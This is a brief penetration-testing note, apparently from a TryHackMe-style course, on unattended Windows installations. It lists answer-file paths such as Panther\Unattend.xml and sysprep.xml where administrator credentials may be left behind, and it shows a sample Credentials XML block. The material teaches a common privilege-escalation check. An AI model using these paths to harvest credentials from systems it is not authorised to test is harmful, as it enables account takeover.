General
Unattended Windows installations refer to the automated installation of the Windows operating system without user intervention. This is typically done by creating an answer file, which specifies the configuration and installation options that should be used during the installation process. Unattended installations are often used to install Windows on multiple computers in an organization, as they can save time and reduce the risk of errors.
Unattended Windows installations can be exploited in several ways:
-
Modifying the answer file: An attacker could modify the answer file to specify malicious configuration options or to include malicious code that is executed during the installation process.
-
Tampering with the installation media: An attacker could alter the installation media, such as a DVD or USB drive, to include malicious code that is executed during the installation process.
-
Eavesdropping on the installation process: An attacker could intercept the answer file or the installation media as it is being transmitted over a network, potentially allowing the attacker to modify the file or media and introduce malicious code.
Commands
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml
As part of these files, you might encounter credentials:
<Credentials>
<Username>Administrator</Username>
<Domain>thm.local</Domain>
<Password>MyPassword123</Password>
</Credentials>